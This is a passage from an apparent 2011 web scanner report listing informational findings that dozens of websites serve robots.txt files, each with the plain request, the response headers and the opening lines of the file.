Severity:   Information
Confidence:   Certain
Host:   http://www.cc.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cc.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:39:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 10 Dec 2008 20:24:38 GMT
ETag: "1280107-637-c8fed80"
Accept-Ranges: bytes
Content-Length: 1591
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:39:22 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.7.2.3 2008/12/10 20:24:38 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

27.306. http://www.ccsf.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccsf.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ccsf.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:04:21 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.7e-p1 DAV/2 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Mon, 02 May 2011 17:15:54 GMT
ETag: "da8899-72d-4a24e2d0fc680"
Accept-Ranges: bytes
Content-Length: 1837
Connection: close
Content-Type: text/plain

# /robots.txt for http://www.ccsf.cc.ca.us/
# comments to jjah@cloud.ccsf.cc.ca.us

User-agent: *
Disallow: /Chat/
Disallow: /Departments/Biology/
Disallow: /Departments/Computer_Science/
Disallow: /N
...[SNIP]...

27.307. http://www.celebridoodle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebridoodle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celebridoodle.com

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web010
X-Webserver: oak-tp-web010
Vary: cookie
Keep-Alive: timeout=300, max=100
Content-Type: text/plain; charset=utf-8
Content-Length: 341
Date: Wed, 04 May 2011 02:09:40 GMT
X-Varnish: 3674989016 3585882565
Age: 79598
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /t/trackback
Disallow: /t/comments
Disallow: /t/stats
Disallow: /t/app
Disallow: /.m/

User-agent: Googlebot-Mobile
Allow: /.m/
Disallow: /

User-agent: Y!J-SRD
Allow: /.m/
Dis
...[SNIP]...

27.308. http://www.celebrityodor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebrityodor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celebrityodor.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:04:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Vary: Cookie
X-Pingback: http://celebrityodor.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset="UTF-8"

User-agent: *
Disallow:

Sitemap: http://celebrityodor.com/sitemap.xml.gz

27.309. http://www.cellphoneaccents.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cellphoneaccents.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cellphoneaccents.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 07 Aug 2009 18:56:35 GMT
Accept-Ranges: bytes
ETag: "faf843c99017ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:54:26 GMT
Connection: close
Content-Length: 434

# /robots.txt file for http://www.cellphoneaccents.com/
# mail webmaster@cellphoneaccents.com with questions or comments

# subdirectory lockouts for regular "www" folder
User-agent: *
Disallow:
...[SNIP]...

27.310. http://www.celtnet.org.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celtnet.org.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celtnet.org.uk

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:41:43 GMT
Server: Apache/1.3.33 (Unix)
Last-Modified: Sat, 25 Jul 2009 10:14:35 GMT
ETag: "10b1182-8ee-4a6adb0b"
Accept-Ranges: bytes
Content-Length: 2286
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /database/
Disallow: /test/
Disallow: /links.php
Disallow: /cgi-bin/apf4
Disallow: /auctions/searchresults.php?
Disallow: /auctions
...[SNIP]...

27.311. http://www.cereal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cereal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cereal.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:41:03 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 07 Apr 2006 14:20:06 GMT
ETag: "6eb815e-22-f416f180"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/

27.312. http://www.chabotcollege.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chabotcollege.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chabotcollege.edu

Response

HTTP/1.1 200 OK
Content-Length: 168
Content-Type: text/plain
Content-Location: http://www.chabotcollege.edu/robots.txt
Last-Modified: Thu, 07 Sep 2006 23:18:59 GMT
Accept-Ranges: bytes
ETag: "b0a081ffd3d2c61:115f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:08:58 GMT
Connection: close

# /robots.txt file for ChabotWeb
# This file excludes robots (search engines) from the following directories:

User-agent: *
Disallow: /test/
Disallow: /Templates/

27.313. http://www.channel933.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.channel933.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.channel933.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4237209160
X-Cache-Server: varnish03
Expires: Wed, 04 May 2011 01:36:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:36:52 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

27.314. http://www.charlestoncvb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charlestoncvb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.charlestoncvb.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:12:26 GMT
Server: none
Last-Modified: Thu, 26 Aug 2010 15:57:27 GMT
ETag: "2faa512-1b9-48ebc0e0447c0"
Accept-Ranges: bytes
Content-Length: 441
Cache-Control: max-age=604800
Expires: Wed, 11 May 2011 01:12:26 GMT
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
   
Sitemap: http://www.charlestoncvb.com/cgi-bin/listings/sitemap.cgi
Sitemap: http://www.charlestoncvb.com/cgi-bin/calendar/sitemap.cgi?user_type=1
Sitemap: http://www.charlestoncvb.com/
...[SNIP]...

27.315. http://www.chatforfree.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chatforfree.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chatforfree.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 03 Feb 2011 04:56:18 GMT
ETag: "23092ae-10f-9602c080"
Accept-Ranges: bytes
Content-Length: 271
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /test
Disallow: /cb8client_bak
Disallow: /FORMfields
Disallow: /FORMgen
Disallow: /picture_library
Disallow: /report
Disallow: /plesk-stat
Disallow: /cb8client/lang
Disallow: /
...[SNIP]...

27.316. http://www.cheapbandgear.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheapbandgear.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cheapbandgear.com

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Fri, 09 Apr 2010 16:35:50 GMT
Accept-Ranges: bytes
ETag: "e44044b72d8ca1:1d3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:43:17 GMT
Connection: close

# robots.txt for search engines

User-agent:*
Disallow: /cgi-bin/

27.317. http://www.cheaptalkwireless.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptalkwireless.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cheaptalkwireless.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:35:15 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "210629f-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

27.318. http://www.cheatbeast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheatbeast.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cheatbeast.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:06:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 05 Feb 2011 16:54:18 GMT
ETag: "3148009-1d5-49b8bd9762280"
Accept-Ranges: bytes
Content-Length: 469
Connection: close
Content-Type: text/plain

Sitemap: http://cdn.attracta.com/sitemap/73611.xml.gz
User-agent: *
Allow: /

User-agent: Mediapartners-Google
Allow: /

User-agent: Googlebot
Allow: /

User-agent: Adsbot-Google
Allow: /

User-agent:
...[SNIP]...

27.319. http://www.cheatchannel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheatchannel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cheatchannel.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:16:44 GMT
Server: Apache/2.2.16
Last-Modified: Sat, 22 Sep 2007 14:48:31 GMT
ETag: "b78031-4a-43aba7b220dc0"
Accept-Ranges: bytes
Content-Length: 74
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
Sitemap: http://www.cheatchannel.com/sitemap.xml


27.320. http://www.cheaters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cheaters.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:16:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Set-Cookie: PHPSESSID=ac2k6uhrtj2rfbmukcog467oo2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.cheaters.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.321. http://www.cheating-wives-datelink.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheating-wives-datelink.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cheating-wives-datelink.com

Response

HTTP/1.1 200 OK
Content-Length: 241
Content-Type: text/plain
Last-Modified: Tue, 16 Nov 2010 15:52:04 GMT
Accept-Ranges: bytes
ETag: "60ed2737a685cb1:165c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:14:12 GMT
Connection: close

User-agent: SurveyBot
Disallow: /

User-agent: ia_archiver
Disallow: /

User-agent: Speedy
Disallow: /

User-agent: *
Disallow: /WebResource.axd

User-agent: *
Disallow: /ScriptResource.a
...[SNIP]...

27.322. http://www.chefs.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chefs.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chefs.edu

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:09:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET; Sitecore CMS
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: chefs#sc_wede=1; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 186

User-agent: *
Disallow: /~/media/LCB/Files/PDFs/Culinary-Outcomes-Disclosures.ashx
Disallow: /About-Us/~/media/LCB/Files/PDFs/Culinary-Outcomes-Disclosures.ashx
Disallow: /sitecore/

27.323. http://www.chieftain.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chieftain.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chieftain.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2082348
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 01:07:24 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0469
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: chieftain.com
X-TNCMS-Served-By: cmsapp8
Content-Length: 795
Connection: close
X-Cache-Info: cached

User-agent: Slurp
Disallow: /content/tncms/ads/
Disallow: /content/tncms/live/

User-agent: Googlebot
Disallow: /content/tncms/ads/
Disallow: /content/tncms/live/

User-agent: Mediapartners-Go
...[SNIP]...

27.324. http://www.childdevelopmentinfo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.childdevelopmentinfo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.childdevelopmentinfo.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:32:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Sun, 24 Oct 2010 23:14:46 GMT
ETag: "ae076c-397-493650a9ec580"
Accept-Ranges: bytes
Content-Length: 919
Connection: close
Content-Type: text/plain

# robots.txt for http://www.childdevelopmentinfo.com/

User-agent: *
Disallow: /admin/
Disallow: /bm.assets
Disallow: /bm.comments
Disallow: /bm.doc
Disallow: /bm.pix
Disallow: /bm.tags
Disallow: /bma
...[SNIP]...

27.325. http://www.childrens.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.childrens.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.childrens.com

Response

HTTP/1.1 200 OK
Content-Length: 691
Content-Type: text/plain
Content-Location: http://www.childrens.com/robots.txt
Last-Modified: Wed, 14 Apr 2010 18:52:52 GMT
Accept-Ranges: bytes
ETag: "2caf3af3dcca1:243"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:29:17 GMT
Connection: close

User-agent: *
Disallow: /Healthcare_Professionals/
Disallow: /Patients_Families/
Disallow: /Healthcare_professionals/
Disallow: /Patients_families/
Disallow: /healthcare_professionals/
Disallow:
...[SNIP]...

27.326. http://www.chiq.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chiq.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chiq.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 12:51:51 GMT
Content-Length: 1657
Date: Wed, 04 May 2011 01:12:56 GMT
X-Varnish: 421583574
Age: 0
Via: 1.1 varnish
Connection: close

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...

27.327. http://www.chnlove.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chnlove.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chnlove.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:29:30 GMT
Server: Apache
Last-Modified: Mon, 14 Dec 2009 13:14:06 GMT
ETag: "234992d-17-47ab00c4c4380"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

27.328. http://www.choicehotels.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.choicehotels.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.choicehotels.ca

Response

HTTP/1.0 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
ETag: W/"137-1302188404000"
Last-Modified: Thu, 07 Apr 2011 15:00:04 GMT
Content-Type: text/plain
Date: Wed, 04 May 2011 03:11:34 GMT
Content-Length: 137
Connection: close

User-agent: *
Disallow: /book*
Disallow: /confirm*
Disallow: /reservation*
Disallow: /a4j*
Disallow: /scripts*
Disallow: /rooms*

27.329. http://www.chooseyourpublisher.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chooseyourpublisher.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chooseyourpublisher.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 20 Apr 2011 05:58:05 GMT
ETag: "a488e5e-cc-4a1534ee79540"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.330. http://www.chop.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chop.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chop.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:56:17 GMT
Server: Apache
Last-Modified: Mon, 28 Feb 2011 17:21:41 GMT
ETag: "1befd6-1b9-49d5ae9bdf340"
Accept-Ranges: bytes
Content-Length: 441
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_Dipq_Joufsofu*80=ffffffff09c9053845525d5f4f58455e445a4a423660;expires=Wed, 04-May-2011 01:58:17 GMT;path=/

User-agent: *
Disallow: /global_ssi/
Disallow: /images/
Disallow: /images_new/
Disallow: /js/
Disallow: /resources/
Disallow: /forum/
Disallow: /professionals/vaccine-healthcare-providers/
Disallow: /
...[SNIP]...

27.331. http://www.christmasplace.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.christmasplace.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.christmasplace.com

Response

HTTP/1.1 200 OK
Content-Length: 212
Content-Type: text/plain
Content-Location: http://www.christmasplace.com/robots.txt
Last-Modified: Fri, 13 Mar 2009 20:03:27 GMT
Accept-Ranges: bytes
ETag: "85afcdc516a4c91:adc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:16:11 GMT
Connection: close

User-Agent: *
Disallow: /basket
Disallow: /templates
Disallow: /utilities
Disallow: /styles
Disallow: /window
Disallow: /schedule
Disallow: /workshop
Disallow: /scripts
Disallow: /myaccount

...[SNIP]...

27.332. http://www.chroniclet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chroniclet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chroniclet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:38:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 19 Apr 2010 23:23:26 GMT
ETag: "c9e82bc-3e2-4849f3f72d780"
Accept-Ranges: bytes
Content-Length: 994
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /_derived/
Disallow: /_private/
Disallow: /_vti_cnf/
Disallow: /_vti_log/
Disallow: /_vti_pvt/
Disallow: /_vti_script/
Disallow: /_vti_txt/
Disallow: /ads/
Disallow: /
...[SNIP]...

27.333. http://www.cigarettesforless.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cigarettesforless.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cigarettesforless.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:21:04 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Fri, 05 Nov 2010 14:57:07 GMT
ETag: "398360-73-4cd41b43"
Accept-Ranges: bytes
Content-Length: 115

User-agent: *
Disallow: /cgi-bin/

User-agent: SiteSucker
Disallow: *

User-agent: Sphider2
Disallow: /cart/

27.334. http://www.cincinnatilibrary.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cincinnatilibrary.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cincinnatilibrary.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 08 Dec 2010 20:09:44 GMT
Accept-Ranges: bytes
ETag: "c21336db1397cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:57:39 GMT
Connection: close
Content-Length: 559

User-agent: *
Disallow: /App_Themes/
Disallow: /asmx/
Disallow: /aspnet_client/
Disallow: /bin/
Disallow: /bt-trp/
Disallow: /chrome/
Disallow: /css/
Disallow: /eLinks/
Disallow: /ephemera/

...[SNIP]...

27.335. http://www.cities97.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cities97.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cities97.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4236730624 4236562861
X-Cache-Server: varnish03
Expires: Wed, 04 May 2011 01:23:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:23:01 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

27.336. http://www.citydirect.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citydirect.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.citydirect.info

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:02 GMT
Server: Apache/2.2
Last-Modified: Tue, 24 Mar 2009 20:36:36 GMT
ETag: "490acf-17-56dabd00"
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /

27.337. http://www.cityrating.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cityrating.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cityrating.com

Response

HTTP/1.1 200 OK
Content-Length: 27
Content-Type: text/plain
Content-Location: http://www.cityrating.com/robots.txt
Last-Modified: Sat, 11 Oct 2008 21:35:19 GMT
Accept-Ranges: bytes
ETag: "1bd47242e92bc91:14c7c6"
Server: Microsoft-IIS/6.0
Hosted-With: GearHost Inc. (www.gearhost.com)
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:47:12 GMT
Connection: close

User-Agent: *
Allow: /


27.338. http://www.civilwar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.civilwar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.civilwar.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:16:25 GMT
Server: Apache
Last-Modified: Wed, 12 May 2010 15:19:48 GMT
ETag: "4b848f-17f-486672c30ed00"
Accept-Ranges: bytes
Content-Length: 383
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.civilwar.com/index.php?option=com_xmap&sitemap=1&view=xml
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/

...[SNIP]...

27.339. http://www.clallam.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clallam.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clallam.net

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 01:44:13 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Thu, 05 Sep 2002 22:21:44 GMT
ETag: "90b6a49d2a55c21:94bc"
Content-Length: 82

User-agent: *
Disallow: /assets
Disallow: /weed
Disallow: /error_page



27.340. http://www.clark.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clark.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clark.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:02:16 GMT
Server: Apache
Last-Modified: Thu, 21 Sep 2006 17:20:49 GMT
ETag: "aa085-7c-41df9f1e19e40"
Accept-Ranges: bytes
Content-Length: 124
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

27.341. http://www.clarksvilleonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clarksvilleonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clarksvilleonline.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:19:53 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
Last-Modified: Wed, 17 Sep 2008 02:17:23 GMT
ETag: "5a4467-1e4-4570e119552c0"
Accept-Ranges: bytes
Content-Length: 484
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /print/
Disallow: /cols/
Disallow: /email/
Disallow: /wp-content/uploads/
disallow: /wp-login.php
# BEGIN XML-SITEMAP-PLUGIN
Sitemap: http://www.clarksvilleonline.com/sitemap.x
...[SNIP]...

27.342. http://www.classadrivers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classadrivers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.classadrivers.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:40 GMT
Server: Apache
Last-Modified: Thu, 31 Jul 2008 21:57:24 GMT
ETag: "2d69427-18-45358f544d900"
Accept-Ranges: bytes
